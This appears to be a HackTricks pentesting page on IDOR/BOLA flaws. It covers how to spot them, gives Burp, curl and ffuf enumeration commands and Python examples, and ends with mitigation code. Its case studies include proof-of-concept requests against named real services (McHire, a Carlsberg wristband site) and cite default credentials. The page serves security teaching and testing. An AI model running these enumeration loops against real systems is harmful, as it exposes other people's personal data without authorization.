IDOR (Insecure Direct Object Reference)
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
IDOR (Insecure Direct Object Reference) / Broken Object Level Authorization (BOLA) occurs when a web or API endpoint exposes or accepts a user-controlled identifier that is used directly to access an internal object, without verifying that the caller is authorized to read or modify that object. Successful exploitation usually yields horizontal or vertical privilege escalation, such as reading or modifying other users' data, and in the worst case account takeover or mass data exfiltration.
1. Identifying Potential IDORs
- Look for parameters that reference an object:
  - Path: /api/user/1234, /files/550e8400-e29b-41d4-a716-446655440000
  - Query: ?id=42, ?invoice=2024-00001
  - Body / JSON: {"user_id": 321, "order_id": 987}
  - Headers / Cookies: X-Client-ID: 4711
- Prefer endpoints that read or update data (GET, PUT, PATCH, DELETE).
- Note when identifiers are sequential or predictable: if your ID is 64185742, then 64185741 very likely exists.
- Explore hidden or alternative flows (e.g. the "Paradox team members" link on login pages) that may expose additional APIs.
- Use an authenticated, low-privilege session and change only the ID while keeping the same token/cookie. The absence of an authorization error is usually a sign of IDOR; a 200 with another user's data confirms it.
Quick manual tampering (Burp Repeater)
PUT /api/lead/cem-xhr HTTP/1.1
Host: www.example.com
Cookie: auth=eyJhbGciOiJIUzI1NiJ9...
Content-Type: application/json

{"lead_id":64185741}
Automated enumeration (Burp Intruder / curl loop)
TOKEN='eyJhbGciOiJIUzI1NiJ9...'   # your own low-privilege session cookie
# seq needs an explicit -1 step to count downwards from your own ID
for id in $(seq 64185742 -1 64185700); do
  curl -s -X PUT 'https://www.example.com/api/lead/cem-xhr' \
    -H 'Content-Type: application/json' \
    -H "Cookie: auth=$TOKEN" \
    -d '{"lead_id":'"$id"'}' | jq -e '.email' >/dev/null && echo "Hit $id";
done
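The manual and automated checks above share one logic: hold the session constant, vary only the identifier, and decide from the response whether the server enforced ownership. The following Python block is an added example (not part of the original page or of any tool it mentions) that implements that decision as a differential test in the style of Burp's Autorize extension, run against an in-memory fake of the lead endpoint so it executes offline. Tokens, account names and lead records are constructed; `vulnerable_api` mirrors the behaviour described in the case study below, while `fixed_api` adds the missing ownership check so both outcomes of the test can be seen.

```python
"""Differential object-level authorization test (added example).

Replay a request that returns an object for its owner with a second,
low-privileged session while changing nothing but the session token.
If the second session receives the same body, the endpoint performs no
object-level check. The HTTP layer is replaced by an in-memory fake of
the lead endpoint so the logic runs offline.
"""
import json
from dataclasses import dataclass

# Constructed sample data: two test accounts and three sequential leads.
SESSIONS = {"tok-alice": "alice", "tok-bob": "bob"}
LEADS = {
    64185742: {"owner": "alice", "email": "a@example.com", "phone": "555-0100"},
    64185741: {"owner": "bob",   "email": "b@example.com", "phone": "555-0101"},
    64185740: {"owner": "alice", "email": "c@example.com", "phone": "555-0102"},
}


@dataclass
class Response:
    status: int
    body: str


def _public(lead):
    return json.dumps({k: v for k, v in lead.items() if k != "owner"})


def vulnerable_api(token, lead_id):
    """Authenticates the caller but never checks who owns the lead (BOLA)."""
    if token not in SESSIONS:
        return Response(401, json.dumps({"error": "unauthenticated"}))
    lead = LEADS.get(lead_id)
    if lead is None:
        return Response(404, json.dumps({"error": "not found"}))
    return Response(200, _public(lead))


def fixed_api(token, lead_id):
    """Same endpoint with an ownership check. Foreign and missing IDs get the
    same 404 so the response is not an existence oracle."""
    if token not in SESSIONS:
        return Response(401, json.dumps({"error": "unauthenticated"}))
    lead = LEADS.get(lead_id)
    if lead is None or lead["owner"] != SESSIONS[token]:
        return Response(404, json.dumps({"error": "not found"}))
    return Response(200, _public(lead))


def differential_test(api, owner_token, attacker_token, lead_id):
    """Classify one ID that belongs to owner_token:
    'IDOR'         attacker gets the owner's body back,
    'enforced'     owner succeeds, attacker is denied,
    'inconclusive' owner request failed or attacker got a different 200."""
    base = api(owner_token, lead_id)
    if base.status != 200:
        return "inconclusive"
    probe = api(attacker_token, lead_id)
    if probe.status == 200 and probe.body == base.body:
        return "IDOR"
    if probe.status in (401, 403, 404):
        return "enforced"
    return "inconclusive"


def enumerate_range(api, token, start, stop):
    """Single-session sweep equivalent to the curl loop above: walk IDs from
    start down to stop and return every one that came back 200. Any hit for
    an ID you do not own is a finding."""
    hits = {}
    for lead_id in range(start, stop - 1, -1):
        r = api(token, lead_id)
        if r.status == 200:
            hits[lead_id] = json.loads(r.body)
    return hits


if __name__ == "__main__":
    print(differential_test(vulnerable_api, "tok-alice", "tok-bob", 64185742))
    print(sorted(enumerate_range(vulnerable_api, "tok-bob", 64185742, 64185740)))
```

Against a real target, replace the two fake handlers with a function that sends the captured request with `requests` and returns status and body; the classification logic stays the same. Comparing whole bodies is deliberately strict: a 200 whose body differs (for example a redacted view) is reported as inconclusive for manual review rather than silently counted either way.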
Enumerating predictable download IDs (ffuf)
Authenticated file-storage panels often keep every user's file metadata in a single files table and expose an endpoint such as /download.php?id=<int>. If the handler only checks that the ID exists (and not that it belongs to the authenticated user), you can walk the whole integer range with your own valid session cookie and pull other users' backups/configs:
ffuf -u http://file.era.htb/download.php?id=FUZZ \
-H "Cookie: PHPSESSID=<session>" \
-w <(seq 0 6000) \
-fr 'File Not Found' \
-o hits.json
jq -r '.results[].url' hits.json # fetch surviving IDs such as company backups or signing keys
- -fr drops the 404-style template responses so only real hits remain (e.g., IDs 54/150 leaking full site backups and signing material).
- The same FFUF workflow works with Burp Intruder or a curl loop; make sure you stay authenticated while incrementing IDs, since an expired session makes every ID look like a miss.
Error-response oracle for user/file enumeration
When a download endpoint takes a username and a filename (e.g. /view.php?username=<u>&file=<f>), small differences in the error messages often provide an oracle:
- Non-existent username → “User not found”
- Bad filename but valid extension → “File does not exist” (sometimes also lists available files)
- Bad extension → validation error
With any authenticated session you can fuzz the username parameter while holding a harmless filename constant, filtering on the "User not found" string to discover valid users:
ffuf -u 'http://target/view.php?username=FUZZ&file=test.doc' \
-b 'PHPSESSID=<session-cookie>' \
-w /opt/SecLists/Usernames/Names/names.txt \
-fr 'User not found'
Once valid usernames are known, request specific files directly (e.g., /view.php?username=amanda&file=privacy.odt). This pattern typically leads to unauthorized disclosure of other users' documents and credential leakage.
2. Real-World Case Study – McHire Chatbot Platform (2025)
During an assessment of the recruitment portal powered by Paradox.ai, the following IDOR was discovered:
- Endpoint: PUT /api/lead/cem-xhr
- Authorization: session cookie of any restaurant test account
- Body parameter: {"lead_id": N} – an 8-digit, sequential numeric identifier
By decrementing lead_id the tester retrieved applicants' full PII (name, e-mail, phone, address, shift preferences) together with a consumer JWT that allowed session hijacking. Enumerating the range 1 – 64,185,742 exposed roughly 64 million records.
Proof-of-Concept request:
# Authenticated as the restaurant test account (cookie name illustrative)
curl -X PUT 'https://www.mchire.com/api/lead/cem-xhr' \
  -H 'Content-Type: application/json' \
  -H "Cookie: auth=$TOKEN" \
  -d '{"lead_id":64185741}'
Combined with default admin credentials (123456:123456) that granted access to the test account, the vulnerability resulted in a critical, company-wide data breach.
Case Study – Wristband QR codes as weak bearer tokens (2025–2026)
Flow: event attendees received QR-coded wristbands; scanning one opened https://homeofcarlsberg.com/memories/, where the browser took the printed wristband ID, hex-encoded it, and called a cloudfunctions.net backend to fetch the stored media (photos/videos + names). There was no session binding and no user verification: knowledge of the ID was the authorization.
Predictability: Wristband IDs followed a short pattern such as C-285-100 → ASCII hex 432d3238352d313030 (43 2d 32 38 35 2d 31 30 30). The space was estimated at ~26M combinations, trivial to exhaust online.
Exploitation workflow with Burp Intruder:
- Payload generation: build candidate IDs (e.g., [A-Z]-###-###). Use a Burp Intruder Cluster Bomb attack with one position for the letter and one for each digit group so the full cross product is covered (Pitchfork only steps through the lists in parallel). Add a payload-processing rule (Encode → ASCII hex) so each position is sent as the hex the backend expects; the fixed "-" separators go into the request template already encoded (2d).
- Response grep: set Intruder grep-match on markers that only appear in valid responses (e.g., media URLs/JSON fields). Invalid IDs typically returned an empty array/404.
- Throughput measurement: ~1,000,000 IDs were tested in roughly 2 hours from a laptop (~139 req/s). At that rate the whole keyspace (~26M) would take roughly 52 hours. The sample run alone already revealed ~500 valid wristbands (videos + full names).
- Rate-limiting verification: after the vendor stated they were throttling, the same Intruder configuration was rerun. Identical throughput and hit rate confirmed the control was absent or ineffective; enumeration continued unhindered.
Quick scriptable variant (client-side hex encoding):
import requests

def to_hex(s):
    # Same cosmetic encoding the front end applied to the printed wristband ID
    return ''.join(f"{ord(c):02x}" for c in s)

# Endpoint and parameter name are placeholders: the real backend was a
# cloudfunctions.net function called from the memories page.
for band_id in ["C-285-100", "T-544-492"]:
    hex_id = to_hex(band_id)
    r = requests.get("https://homeofcarlsberg.com/memories/api", params={"id": hex_id}, timeout=10)
    # Valid IDs returned media metadata; invalid ones an empty array / 404
    if r.ok and "media" in r.text:
        print(band_id, "->", r.json())
Lesson: encoding (ASCII→hex/Base64) does not add entropy; short IDs become bearer tokens that remain enumerable despite cosmetic encoding. Without per-user authentication plus high-entropy secrets, media/PII can be harvested in bulk even when "rate limiting" is claimed.
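To make the keyspace argument concrete, here is an added Python example (not from the original write-up) that generates the `[A-Z]-###-###` candidate space, applies the same ASCII→hex encoding the front end used, and converts the measured request rate into time-to-exhaust and bits of entropy. The pattern and the ~139 req/s figure come from the case study; the function names and the comparison token are assumptions for illustration.

```python
"""Keyspace and payload generation for the wristband pattern (added example).

The printed ID follows L-DDD-DDD; the page only hex-encodes it before
calling the backend. Because the encoding is deterministic and
reversible, the attacker's search space is exactly the printed pattern,
and every candidate can be pre-encoded for Intruder or ffuf.
"""
import itertools
import math
import secrets
import string


def to_hex(s: str) -> str:
    """ASCII -> lowercase hex, the cosmetic encoding the front end applied."""
    return s.encode("ascii").hex()


def from_hex(h: str) -> str:
    """Reversible in one call: the server learns nothing it did not print."""
    return bytes.fromhex(h).decode("ascii")


def wristband_ids(letters=string.ascii_uppercase, digits=3):
    """Yield every ID of the observed pattern, A-000-000 ... Z-999-999."""
    for letter in letters:
        for a in range(10 ** digits):
            for b in range(10 ** digits):
                yield f"{letter}-{a:0{digits}d}-{b:0{digits}d}"


def intruder_payloads(n, **kw):
    """First n candidates, hex-encoded, ready to paste into a payload list."""
    return [to_hex(i) for i in itertools.islice(wristband_ids(**kw), n)]


def keyspace_size(letters=26, digits=3):
    """26 letters x 1000 x 1000 for the observed pattern."""
    return letters * (10 ** digits) ** 2


def entropy_bits(keyspace):
    return math.log2(keyspace)


def hours_to_exhaust(keyspace, req_per_s):
    return keyspace / req_per_s / 3600


def opaque_token_bits(nbytes=16):
    """What the wristband should have carried instead: a random secret.
    secrets.token_urlsafe(16) is 128 bits, far beyond online enumeration."""
    token = secrets.token_urlsafe(nbytes)
    return token, nbytes * 8


if __name__ == "__main__":
    size = keyspace_size()
    print(f"pattern space {size:,} ids = {entropy_bits(size):.1f} bits")
    print(f"at 139 req/s: {hours_to_exhaust(size, 139):.0f} h to exhaust")
    print("C-285-100 ->", to_hex("C-285-100"))
    print(intruder_payloads(3))
```

The numbers are the point: the printed pattern carries about 24.6 bits, so the ~52 hours quoted above is simply keyspace divided by the observed rate, and no amount of re-encoding changes either term. A 128-bit random token in the QR code, bound to an authenticated session server-side, removes the enumeration path entirely.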
3. Impact of IDOR / BOLA
- Horizontal privilege escalation – read/update/delete other users' data.
- Vertical privilege escalation – a low-privilege user reaches admin-only functionality.
- Mass data leakage when identifiers are sequential (e.g., applicant IDs, invoices).
- Account takeover by stealing tokens or resetting other users' passwords.
4. Mitigation & Best Practices
- Enforce object-level authorization on every request (user_id == session.user), not only on list endpoints.
- Prefer indirect, unguessable identifiers (UUIDv4, ULID) over auto-increment IDs. This stops blind enumeration but is not authorization: any identifier that leaks or is shared is still usable without the check above.
- Perform validation server-side; never rely on hidden form fields or UI controls.
- Implement RBAC / ABAC checks in central middleware rather than per handler.
- Add rate-limiting & logging to detect ID enumeration, and verify the limit actually triggers.
- Security-test every new endpoint (unit, integration, and DAST).
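The first two mitigations in code, as an added Python example that is not from the original page: a central ownership check that runs before any object handler, and a per-session indirect reference map so clients only ever see random handles instead of database IDs. The invoice store, user names and function names are constructed for the example.

```python
"""Object-level authorization plus indirect references (added example).

(1) requires_owner loads the object and verifies ownership before the
handler runs, returning the same error for missing and foreign objects.
(2) IndirectRefs maps per-session random handles to real IDs so the
client never sees, and cannot increment, the primary key.
"""
import secrets
from functools import wraps


class Forbidden(Exception):
    pass


# Constructed store: primary keys are sequential (the risky default).
INVOICES = {
    1001: {"owner": "alice", "total": 120.0},
    1002: {"owner": "bob",   "total": 75.5},
}


def requires_owner(store):
    """Central BOLA check. Missing and foreign objects raise the same error
    so the response does not become an existence oracle."""
    def decorator(handler):
        @wraps(handler)
        def wrapper(session_user, obj_id, *args, **kwargs):
            obj = store.get(obj_id)
            if obj is None or obj["owner"] != session_user:
                raise Forbidden("object not found")
            return handler(session_user, obj, *args, **kwargs)
        return wrapper
    return decorator


@requires_owner(INVOICES)
def get_invoice(session_user, invoice):
    """Handler receives the already-authorized record, never the raw ID."""
    return {"total": invoice["total"]}


class IndirectRefs:
    """Per-session map of random handles <-> real IDs. Handles are 128-bit
    random and scoped to one session, so they cannot be guessed or reused."""

    def __init__(self):
        self._fwd = {}   # handle -> real id
        self._rev = {}   # real id -> handle

    def handle_for(self, real_id):
        if real_id not in self._rev:
            handle = secrets.token_urlsafe(16)
            self._fwd[handle] = real_id
            self._rev[real_id] = handle
        return self._rev[real_id]

    def resolve(self, handle):
        if handle not in self._fwd:
            raise Forbidden("object not found")
        return self._fwd[handle]


def list_my_invoices(session_user, refs):
    """Only the caller's objects are exposed, and only as opaque handles."""
    return [refs.handle_for(i) for i, inv in INVOICES.items()
            if inv["owner"] == session_user]


def get_invoice_by_handle(session_user, refs, handle):
    """Both layers apply: the handle must exist in this session's map, and
    the resolved object must still pass the ownership check."""
    return get_invoice(session_user, refs.resolve(handle))


if __name__ == "__main__":
    refs = IndirectRefs()
    handles = list_my_invoices("alice", refs)
    print(handles, get_invoice_by_handle("alice", refs, handles[0]))
```

The indirection map is a defence in depth, not a replacement for the ownership check: even if a handle were somehow injected into another session's map, `requires_owner` still rejects the resolved object. In a real framework the map lives in server-side session state and the decorator runs in middleware, so no handler can forget to call it.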
5. Tools
- BurpSuite extensions: Authorize, Auto Repeater, Turbo Intruder.
- OWASP ZAP: Auth Matrix, Forced Browse.
- GitHub projects: bwapp-idor-scanner, Blindy (bulk IDOR hunting).
References
- McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants’ PII
- OWASP Top 10 – Broken Access Control
- How to Find More IDORs – Vickie Li
- HTB Nocturnal: IDOR oracle → file theft
- 0xdf – HTB Era: predictable download IDs → backups and signing keys
- Carlsberg memories wristband IDOR – predictable QR IDs + Intruder brute force (2026)